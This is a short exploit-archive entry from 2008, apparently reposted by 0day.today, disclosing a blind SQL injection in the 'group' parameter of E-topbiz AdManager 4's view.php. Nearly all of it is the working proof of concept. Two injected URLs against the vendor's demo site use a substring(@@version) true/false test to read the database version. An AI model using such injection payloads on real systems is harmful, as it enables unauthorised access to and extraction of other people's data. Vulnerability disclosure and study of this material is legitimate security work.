E-topbiz AdManager 4 (group) Blind SQL Injection Vulnerability

2008-11-17T00:00:00
ID 1337DAY-ID-4190
Type zdt
Reporter Hussin X
Modified 2008-11-17T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
E-topbiz AdManager 4 (group) Blind SQL Injection Vulnerability
==============================================================


E-topbiz  AdManager 4 (group)  Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X
___________________________________

script  : http://e-topbiz.com/oprema/pages/admanager4.php

Demo :
_______
true & false

http://e-topbiz.com/trafficdemos/admanager4/view.php?group=4+and%20substring(@@version,1,1)=4
http://e-topbiz.com/trafficdemos/admanager4/view.php?group=4+and%20substring(@@version,1,1)=5

Version = 4  :) 



#  0day.today [2018-04-12]  #